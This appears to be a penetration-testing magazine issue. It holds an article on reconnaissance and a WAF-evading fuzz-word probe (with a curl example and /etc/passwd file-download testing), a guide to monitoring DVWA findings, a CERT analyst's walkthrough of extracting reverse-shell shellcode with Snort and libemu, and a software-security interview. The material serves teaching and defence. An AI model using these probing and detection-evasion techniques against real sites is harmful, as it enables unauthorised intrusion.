Assume the target runs PHP, which Apache usually does. In the case of ASP, it's most likely powered by an IIS webserver. The above query returns the main domain and subdomains (excluding the forum), where the file extension is .php. It can also be modified to exclude directories and several other subdomains; so instead of excluding the forum, www is often used in my queries, which filters most of the main website away, making it easier to find potential subdomains with dynamic PHP scripts, for example.
Usually it is possible to just look at error pages (e.g., 404) served by the webserver, or at HTTP headers for that sake, in order to determine the scripting language and webserver. The problem is that some administrators change these headers and error pages, but rarely the file extension, except in SEO cases where .php might be .html instead; on the backend it is still PHP files that serve the website.
The reason why this query is used is because many websites use rewrite rules (e.g., mod_rewrite) these days, so it's sometimes hard to guess what's powering the target website, especially when there's no default index file such as index.php. So by finding just one dynamic file with the .php extension, it's easier not only to assume which vulnerabilities to look for, but also to test this file, or perhaps several returned files from the search query.
Most PHP files without any visible GET or POST requests are not much help, and some do not show them even if these files are accessed directly; however, if there's a link to one of these, then Google will most likely know some or all of the requests that may contain a vulnerability due to non-sanitized input.

Heuristically Approaching & Avoiding WAFs

Imagine you see that a file accepts two GET requests: the first one is loggedin=1 and the second is downfile=info.pdf. Obviously, if the pseudo-file info.pdf can be downloaded with this call, the penetration tester should try to download other files, perhaps the well-known /etc/passwd.

Figure 6. Google: Using Operators for Recon and Enumeration

An automated scanner will try predefined strings until it finds something useful, while a manual, heuristic method would probably be much more fruitful (see Figure 7).
Using a program to find these possibly vulnerable files is a good idea, but testing them manually may return more interesting results, such as shown below. In this case, a locator-string like pentest01'"/\>< could be used. It doesn't look like much, but if all characters are returned without being sanitized, then it's possible to perform XSS. If a SQL error is returned, perhaps invalid syntax, then ' or " broke the SQL query, which thereby allows a possible SQL injection. If a file error is returned, then LFI or RFI may be possible. In case of no such command, perhaps RCE (Remote Code Execution) could be attempted.
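As a single request (the URL and parameter names follow the hypothetical download script above), the whole check can be as simple as:

curl 'http://target.example/download.php?loggedin=1&downfile=pentest01%27%22/\><'

The quote characters are percent-encoded here only so the shell and URL parsing do not eat them; the script under test still receives the literal ' and ".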
This way of finding vulnerabilities only applies to input validation vulnerabilities, which are often the most dangerous ones. Because the penetration tester's goal is to gain access to the server backend, it's logical to assume that high-risk vulnerabilities are the most valuable. It's true that XSS can lead to Remote Code Execution as well (see Figure 8), but this approach requires user interaction.
Our locator-string (a.k.a. fuzz-word) required one query (see Figure 9), while the automated scanner most likely created a massive overhead by sending perhaps 10 different strings to determine whether there was a vulnerability and what it might have been. Most Intrusion Detection Systems (IDS) would have picked up on this amount of attempts and traffic, while the fuzz-word may not have been detected at all. Most Web Application Firewalls (WAF) would not get triggered by this fuzz-word either, except that some (including web applications) may not respond very well to the slash (/) due to mod_rewrite, or to > and <, since they are uncommon in most queries. Hence the reason some WAFs are triggered by them.

Figure 7. 0day: Local File Disclosure

Figure 8. EvilWebtool: vBSEO XSS Exploit

There's a reason why the locator-string ends with >< and not <>: most WAFs are triggered by <[a-Z0-9]>, while they are not yet triggered by >[a-Z0-9]<. This gives the penetration tester an advantage in that it requires fewer queries for success. An experienced penetration tester may need to ask him- or herself: if <[a-Z0-9]> is blocked by a WAF, then how does this give a pentester an advantage over an automated scanner?
Imagine an aggressive WAF on, let's say, a website many people visit within the Information Security community. A penetration tester fires up his favorite scanner, and one minute later, he's banned for a few hours. Either he learns from this mistake, and finds out it was <[a-Z0-9]> that triggered the ban, or he continues to restart the scanner whenever possible and wastes precious time.
Now imagine a blackhat has discovered a Local File Inclusion (LFI) vulnerability on the same target, but the WAF blocks all malicious-looking attacks and bans her temporarily for a few hours. However, this blackhat has no timeframe within which she must finish the attack, so after researching the WAF she finds a DoS vulnerability enabling her to shut the WAF down and thereby abuse the LFI vulnerability she found earlier.
Most automated scanners use real attacks, of course, as they are most efficient this way and are able to determine whether there is a vulnerability or not, instead of using these so-called fuzz-words (see Figure 9). So the chance that a WAF picks up the attacks is much higher than with one single fuzz-word designed to avoid even most (but not all) aggressive WAFs.

Figure 9. FireFox: After submitting our fuzz-word to a script



Table 1. Humans vs. machines

                                    Humans             Machines
Finding Advanced 0days              Yes                No (Requires AI)
Simultaneous Requests               No                 Yes
Smart Interpreting of Results       Yes                No (Requires AI)
Massive Variations in Requests      Time consuming!    Yes
Detect All Common Vulnerabilities   Time consuming!    Yes
Discover New Attack Methods         Yes                No (Requires AI)
Enumerate Large SQL Tables          Time consuming!    Yes

Why not just use ' or "?

A manual audit of (e.g.) access logs would tell most aware webmasters from miles away that someone tried to perform a SQL injection. A fuzz-word is harder to spot if it looks legit. But why is this important? Some penetration tests also check the skills of the administrators, internal security auditors, or perhaps just the IDSs, to see if they would be able to pick up a blackhat-looking attack if it happened.
The target script may not break with just ' or "; it may even require a / or \, or maybe the penetration tester does not know whether a particular SQL query breaks upon ' or ", so it's reasonable to include the most common characters a function will break upon receiving. (Including all possible special characters is not recommended, nor would it be efficient.)

When a download-file script is encountered, it's obvious to test for LFI, RFI, Information Disclosure, and so forth. But an automated scanner may not know the target script is actually serving files from the filesystem; it may think it serves them from a SQL database and therefore attempt to SQL inject instead, which may lead to no results at all.

What is considered best practice nowadays?

Don't rely too much on any automated scanner. Use them as a complement to your toolbox as well as to your own methods. While the automated scanner does all the boring work, such as crawling the website and trying the most common attack vectors, the penetration tester can simultaneously apply more advanced heuristic methods and look for vulnerabilities in the same or other places.

After all, at many points humans are still smarter than machines, and if a penetration tester knows a web application very well, then he or she also knows which vulnerabilities to look for and where they might be, based on a behavioral pattern from previous vulnerabilities.
With vBulletin, for example, it's obvious to look for XSS and SQL injections in new versions with new features. Looking for LFI and RFI in this particular web application could be a complete waste of time, except in the add-ons. If new developers have come aboard or an entire development team has been switched out, then the target web application may have become insecure, so it's good to know how the company behind the app is working and evolving too.
What are some of the differences between humans and machines, then? See Table 1.
A report a couple of years ago revealed that 44 out of the 50 most visited websites in a country had at least one vulnerability. Many of them ran custom-built websites, but well-known web applications (mostly via add-ons and subdomains) also included vulnerabilities. Many of these websites had been tested with automated scanners, but apparently not properly and/or not with manual methods.
The third and final step is intuition applied to knowledge.

HANS-MICHAEL VARBAEK
Hans-Michael Varbaek has been in the hacking community for a little over 10 years now, though with shorter and longer breaks from time to time. Around 5 years ago he decided to get back in after a long period of inactivity, when he began creating custom cheats for WoW (Mountain Climbing, No Clip, etc.). A year later he began his education as a SysAdmin, and during this time he created InterN0T after brainstorming like crazy. Then he moved to Sweden to work within IT support, with some of the big manufacturers of products like printers, cameras, and so forth. Meanwhile, he discovered his first 0days in Web Applications, and a year later he was going for CTP+OSCE, which he completed successfully. Shortly thereafter he began blogging about Web Application Security at Exploit-DB.


HOW-TO

Operationalizing Penetration Testing Results Using Network Monitoring Software – All For Free

We will model the results of a penetration test using network and application monitoring tools. The end result will be a dashboard showing you the vulnerabilities that still exist and the ones that have been remediated. This gives you a quick view of your vulnerabilities and the speed with which they're resolved.

Penetration testing these days is often done on a one-off basis, meaning companies do them once a month, once a quarter or once a year and then never think about them again. I find that to be a shame and think that penetration testing can be an invaluable tool in vulnerability management when performed properly.
One of my hobbies/passions/interests/whatever in the industry is finding a way to effectively operationalize security. That is, moving security out of the "this is theoretically possible" realm and into the "hey, we should fix this because it's happening now" realm. Part of this, I think, is finding a way to utilize the tools used by our compatriots in the network and applications management domains. This article will use two very popular (well... one very popular and one really-should-be-popular) tools in the network monitoring and application monitoring spaces, respectively. This will give us a way to display that the vulnerabilities from the report still exist as reported and to measure the response/remediation time.

Tools Needed:

•	Icinga (http://www.icinga.org): a fork of the popular Nagios (www.nagios.org) monitoring suite.
•	Webinject (http://www.webinject.org): a very powerful Perl script tool that allows you to build test cases for web applications.
•	DVWA, Damn Vulnerable Web Application (http://www.randomstorm.com/dvwa-security-tool.php): an intentionally naughty web application.
•	A Linux operating system. I used Ubuntu 10.10 for everything, but you may use what you wish.

You will obviously need network connectivity between the machines, and virtual machines are recommended for this exercise. You will also have to be able to talk to the web application on the desired ports (typically ports 80 and 443).
Setting up these tools is beyond the scope of this article, but the installation documentation for all three tools is excellent; plus, there are LiveCDs for two out of the three of them, so go ahead and get your environment set up.
In our theoretical world, let's pretend we just received a penetration test report saying that our web application (DVWA) has a weak password associated with it. For this example the login is admin/password. We begin by using Webinject to test that the login does indeed work. This is done by creating a testcase in Webinject language: see Listing 1.
The first test, cleverly given the id of 1, verifies that the login.php page loads correctly; we want to be sure it's there before we try to log in to it. The second test then posts our username (admin) and our weak password to login.php and then verifies we can see the content behind the login.

Listing 1. Creating a testcase in Webinject language

---testcases.xml
<testcases repeat="1">
<case
	id="1"
	description1="Load Login Page"
	description2="verify Page Loads"
	method="get"
	url="http://192.168.38.156/login.php"
	verifypositive="Damn Vulnerable Web Application"
/>
<case
	id="2"
	description1="Verify Weak Login Works"
	method="post"
	url="http://192.168.38.156/login.php"
	postbody="username=admin&password=password"
	verifypositive="Welcome to Damn Vulnerable Web App"
/>
</testcases>

We can further extend this to test cases encompassing everything on our reports. SQL injections, XSS bugs, etc. can all be modeled this way and monitored for. The beauty of using Webinject is that it allows us to use it easily as a Nagios/Icinga plugin. Simply add <reporttype>nagios</reporttype> to config.xml and you will get Nagios/Icinga-compatible output.
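Wiring the check into Icinga then comes down to a command and a service definition. A minimal sketch follows; all paths, host and service names here are assumptions, not taken from the article:

define command{
	command_name	check_webinject
	command_line	/usr/bin/perl /opt/webinject/webinject.pl -c /opt/webinject/config.xml /opt/webinject/testcases.xml
}

define service{
	use			generic-service
	host_name		dvwa-server
	service_description	PenTest finding: weak DVWA admin password
	check_command		check_webinject
}

With <reporttype>nagios</reporttype> set, webinject.pl exits with Nagios-style status codes, so the service shows critical while the weak login still works and recovers once the finding has been remediated.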
Now, you could very easily be done at this point. You have some test cases to run that verify the issues found in the report. You could put this in a cron job that emails you the status every couple of days and be perfectly happy. However, with a little more work you can integrate this verification with Icinga and then have a near real-time dashboard showing the status of your remediation efforts. This integration will do a few things for you; most importantly, it will provide some perspective on how much badness was really found during your penetration test. It will also add some accountability, as you can break up the dashboard by responsible groups. This way the server administrators can see what is going on with the servers and the application team can see just the applications. Finally, it can provide some reporting on how fast vulnerabilities are getting resolved.
This can be a powerful tool in your arsenal: it speaks the languages of your network and application teams, as well as articulating the vulnerabilities to your security team, while providing metrics for your business team.

BILL MATHEWS
Bill Mathews is co-founder and lead geek of Hurricane Labs, an information security firm founded in 2004. Bill wrote this article while recovering from pneumonia so any errors are purely the result of medication. :-) You can reach Bill @billford on Twitter and read other musings on http://blog.hurricanelabs.com


TOOLS

Pulling Shellcode From Network Stream

In computer security terms, a shellcode is used as a payload in exploiting software vulnerabilities. It consists of a small piece of code, the execution of which may result in the attacker starting a command shell, from which the attacker can control the compromised computer; hence the term shellcode. But its function is not limited to spawning a shell only; it can go the other way around as well.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote) [1]. Shellcode can usually be seen and grabbed from the network stream with the help of the proper tools in hand. The Metasploit framework provides ready-to-run shellcode modules that can be compiled easily. The earlier days of exploitation with shellcode required lots of coding and programming effort; Metasploit has simplified this in its framework. In this article, we will use several security tools to pull shellcode from a network stream and analyze the output.

Tools Used

To perform analysis of a network stream, several open source security tools are demonstrated in this article, namely the Sguil framework, the Snort Intrusion Detection System, Wireshark and Libemu. Note that not all of these tools are necessarily required in shellcode analysis. This is only for demonstration purposes.

Sguil

The Sguil framework [2] is the standard tool used in Network Security Monitoring (NSM) and event-driven analysis of IDS alerts. Sguil's main component is an intuitive GUI that provides access to a wide variety of security-related information, including real-time IDS alerts, a network session database and full packet captures. Widely considered the de facto IDS standard, Snort is used as one of the main components of the Sguil framework, together with sancp, pads and pcap.

Figure 1. Snort Rule and Signature

Figure 2. Sguil Framework

Wireshark

Wireshark is a popular network protocol analyzer and is used to analyze network traffic on Unix and Windows. We can gain lots of information relating to network activities using Wireshark, as well as inspect the shellcodes that have been flagged by the Snort IDS. This step will be explained later.

Libemu

Libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion detection/prevention systems and honeypots. We use libemu here to detect the shellcode, then execute and emulate it. The output of the emulated process can be seen, and we can study the behavior and what the shellcode does. Libemu can be obtained from the libemu website [3].

Snort Rules Definition And Signature

An analyst can start tracing incidents by checking and monitoring network security systems and devices. In this article, the Snort IDS is used as the main alert indicator. The rule used for the detection of the shellcode is shown in Figure 1; it has been taken from emerging-exploit.rules in the default Emerging Threats rule set.
This particular rule will be triggered if the source of the attack is the external network on the shellcode ports, the destination is the home or internal network, and the traffic matches the rule's content. The rule content is D9 EE D9 74 24 F4 5B 81 73 13 and 83 EB FC E2 F4, which matches the default Metasploit encoder.
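Figure 1 itself is not reproduced here, but a rule of that shape looks roughly like the following sketch (options abbreviated; the msg and sid are illustrative, not the exact Emerging Threats rule):

alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET EXPLOIT x86 PexFnstenvMov/Sub Encoder"; content:"|D9 EE D9 74 24 F4 5B 81 73 13|"; content:"|83 EB FC E2 F4|"; classtype:shellcode-detect; sid:1000001; rev:1;)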

Sguil Alert System And Analysis

The analysis starts by analyzing alerts from the Snort IDS. The Sguil framework provides a comprehensive environment where the analyst can see the alerts that trigger the rules discussed in the section Snort Rules Definition And Signature. Figure 2 shows the Sguil frontend.
The main question for analysts on viewing such alerts and attacks is what they (the attackers) are trying to do and what payload was used within the attack. Here we can see the attacker using a Metasploit encoder, triggering the Snort IDS rule identified as Exploit x86 PexFnstenvMov/Sub Encoder. To help us understand and grab the shellcode, below are some of the steps that we can take.

View The Transcript Event

In Figure 3, the analyst can perform a quick view of a transcript event by right-clicking on the Alert ID number and choosing Transcript. Transcript is very useful for ASCII-based protocols, and it generates full content data for the alert, if available. Figure 4 shows the output of Transcript and gives the analyst a quick view of the content data for the alert. In Figure 4 we can see an overview of the attack, but this normally is not sufficient for doing in-depth analysis of a network-based attack.

Figure 3. Transcript Option

Figure 4. Transcript Output

Shellcode Analysis

Read The Full Content Of Pcap Using Wireshark
Within the Sguil framework, analysts can launch Wireshark to inspect the full content data generated by the alert. In Figure 5, by clicking on the Alert ID column, the analyst can choose the Wireshark option, which will launch the Wireshark application to help further investigation of the payload. The analyst can then proceed with network analysis by navigating to Follow TCP Stream (Figure 6) inside Wireshark.
The output of Follow TCP Stream can be seen in Figure 7. Here we can see that the highlighted area of the hex dump contains the suspected components of the shellcode, due to the NOP-slide opcode 0x90.

Figure 5. Wireshark

Figure 6. Follow TCP stream option

Figure 7. Suspected Shellcode

In x86 exploits, the most commonly used NOP-slide uses opcode 0x90 (NOP) [4]. Network intrusion detection systems like Snort and other IDS brands can detect long sequences of NOPs, which are most commonly used for timing purposes, to force memory alignment, to prevent hazards, to occupy a branch delay slot, or as a placeholder to be replaced by active instructions later on in program development [5]. Furthermore, this traffic matches the Snort signature contents D9 EE D9 74 24 F4 5B 81 73 13 and 83 EB FC E2 F4. To analyze it, copy the selected area from the Wireshark output and paste it into a file; we name it here x86penv_hexdump. A simple bash one-liner can then extract the hex-only values for better output. For example:

$ more x86penv_hexdump | cut -d' ' -f3-19 | sed -e 's/ //g'

Figure 8. Hex Output

References

[1] http://en.wikipedia.org/wiki/Shellcode
[2] http://sguil.sourceforge.net/
[3] http://libemu.carnivore.it/
[4] http://www.phreedom.org/solar/honeynet/scan20/scan20.html
[5] http://en.wikipedia.org/wiki/NOP
[6] http://msdn.microsoft.com/en-us/library/ms742212%28v=vs.85%29.aspx
[7] http://sandsprite.com/shellcode_2_exe.php
[8] http://malzilla.sourceforge.net/

The above shell command will produce the output we need, as shown in Figure 8.
The extracted hex can then be copied and pasted into the online shellcode-to-exe converter [7] to get the bytes-only format. In Figure 9, save the output as bytes only. The bytes.sc file is actually a data file which will later be fed to libemu's sctest command to get the shellcode analysis. An easier and simpler way is actually to directly feed in the raw file, which is a pcap-format file that can be downloaded from the Sguil framework. The raw file is then fed for analysis with libemu's sctest and produces the same results as the bytes.sc file. However, this does not work with all raw-format files.

Figure 9. Shellcode Conversion

Libemu analysis and output

To proceed with shellcode analysis, libemu is used to emulate and detect the shellcode. To use libemu's sctest, simply issue this command:

$ /opt/libemu/bin/sctest -Sgvs 10000000000000 < bytes.sc

Several sctest options to understand here: -S reads the shellcode or buffer from stdin; -g (or -getpc) runs getpc mode and tries to detect a shellcode; and -s sets the maximum number of steps to run, which in Figure 10, for example, is set to 10000000000000. The -v option is for verbose output. Below is the emulated output generated by libemu from the bytes.sc file.
Figure 10 shows the shellcode executed inside libemu's sctest. Based on the figure, we see that the shellcode will try to establish a reverse connection to IP address x.x.227.12 on port 18005. Prior to establishing the reverse connection to the said IP address, the shellcode calls a function named LoadLibraryA to load a DLL library. The shellcode then initiates a standard connection startup by calling a sequence of functions: WSAStartup, WSASocket [6] and connect. The connect function receives a set of parameters, which are used later to connect to the IP address and to port number 18005.
The payload used in this attack will establish a reverse connection to the malicious server x.x.227.12 on port 18005. At this point, we have already captured two important pieces of information in our analysis: the attacker IP and the port number it connects to. Further analysis of the actual binary extracted from the shellcode can be conducted to see what activities are involved while initiating and establishing the reverse connection to the attacker's IP and port.

Figure 10. Shellcode executed in libemu sctest
Conclusion

Pulling shellcode from a network stream is possible, given that we use the proper tools and techniques while extracting it. Further analysis is usually required to fully understand the shellcode's behavior, to the extent of determining whether it was successful in exploiting the systems. By using widely available free and open source tools such as the Snort IDS, Wireshark and libemu, shellcode analysis for network-based attacks becomes less hectic.
For further analysis and the reverse engineering part, shellcode that has been pulled from the network stream can be converted to a binary or .EXE format file. This is crucial for the analyst to do live malware analysis or reverse engineering by running the binary inside a secure lab environment.
Malzilla [8], a malware hunting tool, also utilizes libemu in its program for shellcode analysis and detection. Libemu's sctest function can also be integrated within Wireshark for immediate shellcode detection. This will be covered in the next version of the article.

SALAHUDIN WAN KHAIRUZZAMAN
Salahudin Wan Khairuzzaman is a security technologist and intrusion analyst at the Malaysian CERT (MyCERT). His areas of focus and interest are network security monitoring and analysis, distributed honeynets, and network/infrastructure planning and virtualization. He is also a CyberSAFE ambassador at CyberSecurity Malaysia and has conducted several presentations for the Malaysian public regarding Internet security.


INTERVIEW

Interview with Gary McGraw, Ph.D., CTO of Cigital

Gary McGraw from Cigital talks about his views on software security and the Building Security In Maturity Model.

You are a recognizable figure in the world of IT security, but for the sake of introduction, could you give us a nutshell story of your work in this field and how you see it?

Software security is a field that I've been working on diligently for the past fifteen years. It's been interesting to watch it grow and evolve, and turn into a real field over those fifteen years. Now there are lots of people and firms that are doing plenty of things to make software better, which in my view is the only way to make improvements in computer security. I work for Cigital as the CTO, and we help large enterprises with setting up and executing software security initiatives. There are many firms doing that sort of thing now. At Cigital we help those firms both plan and execute software security initiatives.

Your main project right now is the Building Security In Maturity Model.

BSIMM is one of my projects; we always have a million things going on at Cigital! The notion behind the BSIMM is to be able to measure a large-scale software security initiative and tell whether progress is being made. We gather data to help you strategize about how to do a better job. The cool thing is that the BSIMM was designed to be able to measure progress regardless of what software security methodology you are following. That is, you can use the BSIMM to measure the Microsoft SDL, which we've done, and you can use the BSIMM to measure Google's approach, even though they don't really have a software security methodology per se. You can use the BSIMM to measure big banks, like Bank of America and all their seven divisions. By far the best thing about the measuring aspect of the BSIMM is that you can start to do some science, some comparison between software security initiatives. So, it's very much a data-driven scientific exercise in software security. (See http://bsimm.com for more and to download a free copy of the model for yourself.)

You have always advocated the necessity of strengthening software rather than concentrating on devising outside security systems, like firewalls or malware protection. Is the BSIMM the embodiment of your convictions in this field?

It is. What I have advocated is building systems that are secure in the first place, instead of trying to protect broken ones. The state of the practice back in the mid-1990s was to put a firewall between the bad people and the broken stuff. And my simple question was: how come the stuff is broken? If you take that philosophy to heart, you end up working on building more secure software, and that's exactly what Cigital does. We invented technology like code-scanning tools (we built the one behind the Fortify code scanner that recently got sold to HP, for example). That kind of technology and that kind of approach is really becoming popular now. It's a great pleasure for me to watch the blossoming of this field.


How would you describe the idea behind BSIMM? How does it work and what outcome does it produce?

We gather data first from firms; now we have data from 33 of them. We've actually made over sixty measurements if you include major divisions inside the 33 firms. We gather all of this data and we build a model that you can use to measure any software security initiative. If you have a firm that hasn't been measured yet, what you do is you go in and you sit with the executives who run the software security group and also (at separate times) with the people who run different development groups; you interview them about software security and what they're doing. The interview questions are not leading questions at all. Instead, the exercise is meant to elicit the data needed to score somebody against the BSIMM. You can actually make lists of what activity has been observed in the firm. Sets of observed activities collectively add up to the score. Then there are many ways that you can visualize those data, including low-resolution views and high-resolution views, all the way down to the level of the 109 activities that we describe in the BSIMM. When you do that, you get a really clear view of what your software security initiative looks like in comparison to all of the others in the data set. It is a very powerful technique, especially when you use it to discuss your budgets, or where you stand next to your peers.
Right now we have more data from financial services organizations than from any other sector. The second-largest dataset is from high-technology firms and independent software vendors. So there's tons of data there that you can use for comparison, and then you get a score, and charts that show where you stand. You can use those data to drive your initiative, and then, later, re-measure. Actually, we have just re-measured Microsoft. We interviewed the head of the software security group (that's a group of about a hundred people), some of his lieutenants, and also some of the program managers for the SDL.

Microsoft is a very big firm. How long does it actually take to measure such huge enterprises?

It only took us about seven hours of interviews. Then we took all the data that we got, and it took a couple of weeks to compute the score. The really cool thing was that we measured Microsoft two years ago, and then we measured them again just recently. We can actually talk about the changes in their initiative over time, both in terms of new activities that they're taking on, and also in terms of those they may have dropped, or emphasized less. Now we have what is called longitudinal data in the study. There are ten firms that we have measured twice, so we can talk about the evolution and the change in a software security initiative over time.

How do you find the cooperation with the firms involved in the project? Do they participate without reservations, or do you need to convince them that it is for a greater good? Do they trust you?

Absolutely (though not all of them allow us to go public with their names). There are currently 23 firms that do allow us to say their names, and there are 10 who would prefer that we don't. Many of the firms in the study are financial services organizations who would rather not talk about security in public. There are also those who took a long time to give us permission. For example, now we can state that SAP, the second biggest software company on planet Earth, is part of the BSIMM, but it took two years for the Germans to let us do that! Some people think that it's better not to talk about security because the people (their customers) don't worry about it in the open; they take it for granted. The interesting thing is that this is a very European trend, while most American financial services organizations don't have any issues with going public.

Trust is vital for BSIMM.

Absolutely, cooperation is totally essential to gathering good data. The BSIMM doesn't work by standing outside of a firm and trying to measure it. You have to go inside, and you have to talk very frankly with the people who run the software security group. They have to invite you into their living room. And maybe even into their bathroom. However, all of the firms who chose not to be publicly discussed do participate actively and openly in the BSIMM Community. We have a moderated mailing list that we all participate in, and we had a couple of social events, including a conference last fall in Annapolis (Maryland), which a lot of firms attended. Some of them may not publicly state that they're participating in the BSIMM, but they were there at the conference. In fact, one of the really cool aspects of the project is the community that has developed: a community of like-minded senior executives working on software security initiatives all day at large enterprises.

Why was BSIMM2 introduced? Is it different from the first version?

The first BSIMM that we released was a study of nine firms. BSIMM2 was released in April 2010 and is a study of thirty firms. We took the original BSIMM measuring stick and we validated it with twenty-one more data vectors (representing new firms). The interesting thing about BSIMM2 is that once you have thirty vectors, you can begin to do statistical analysis, which is significant. We ran all sorts of statistical analyses against the data, and we publish the most interesting findings and talk about them. There will be a BSIMM3 soon, in which even more companies will participate; we're shooting for forty. There will also be BSIMM Longitudinal, which amounts to studies done over time for some firms (ten so far). We will once again release all of these data publicly, so that everyone in the field and everyone in security can use them and think about metrics and measurements in a much more serious fashion than has been done in the past.

Talking about the past, you once mentioned creating something that you called a science of software attack. Do you really think developers need to be taught to think like a bad guy?

I used to believe that it was important to teach developers to think like that, but I have changed my mind. I still believe that it is very important for the security people in large organizations to be able to think like a bad guy and understand software exploits. But when it comes to developers, I think it's much more important that you teach them how to do things right: how to do what you might call defensive programming, how to use frameworks properly, and so on. If you go to developers and you say, please code like this, steal this idea, use this design pattern, it's way more effective than saying, let me teach you about cross-site scripting exploits, which is not what developers need to learn.

You have also said that at the beginning of your work you and your colleagues felt like evangelists, out to save the world, because the idea that the software itself might be the cause of trouble was not popular. Has anything changed in this matter?

(laughs) I used to call myself an evangelist, but I changed the word I use to advocate. But yes, I still feel like it's still pretty early in the field, and there are a lot of people who need to be convinced that software security is the right way to go. However, we have turned the corner from philosophy and wishful thinking (from the notion of gosh, we've got to do something, anything) to science. We know what to do, we know how to measure it; now let's all be serious adults and get this done. It's been very gratifying to watch us turn the corner from what I would like to call faith-based software security in the early days to a science of software security now.


What, in your opinion, will be the security trends in 2011?

One of the big trends that's important to track and understand is the evolution of malware. I think that things like the Zeus Trojan, which goes after banking credentials, and, even worse, Stuxnet, which goes after control systems, show us just exactly how bad malware can be. In my view, the only way to solve this problem is to build better software, because malware usually leverages bugs and flaws in target software in order to get onto the system in the first place. Another trend is the growth of software security as a field. Software security is beginning to move beyond the early adopters and into the wide middle ground of medium-sized and smaller enterprises. A lot of small to medium-sized companies are now realizing that they need to pay serious attention to software security. That's a trend that we'll definitely watch unfold over the next couple of years.

What would you advise enterprises at the moment?

The number one piece of advice is really very simple: you should have a software security group (SSG) in your enterprise (see You Really Need a Software Security Group). The SSG shouldn't be part of the security operations group, nor should it be part of development; it should be its own group, and there needs to be a very senior executive in charge of software security who has both authority and responsibility, and the resources necessary to carry out a software security initiative. If you look at people like, say, Brad Arkin at Adobe, or Jeff Cohen at Intel, or Steve Lipner at Microsoft, or Janne Uusilehto at Nokia, you will find a class of executives who are working diligently every day on software security with very large staffs and very large budgets. So, if you run an enterprise and you don't have a software security group yet, you need to fix that immediately. Also note that a BSIMM measurement and involvement with the BSIMM Community is a good idea.

Could you tell us what you are working on at the moment besides BSIMM? Are you planning to publish anything soon?

I'm supposed to be writing the second edition of Building Secure Software. That's a book that I wrote with John Viega originally in 2001, so it's been a decade since that book was written, and it still gets bought and read by people. I think it could use an update.

personal http://www.cigital.com/~gem
company http://www.cigital.com
podcast http://www.cigital.com/silverbullet
blog http://www.cigital.com/justiceleague
book http://www.swsec.com

PENTEST MAGAZINE TEAM

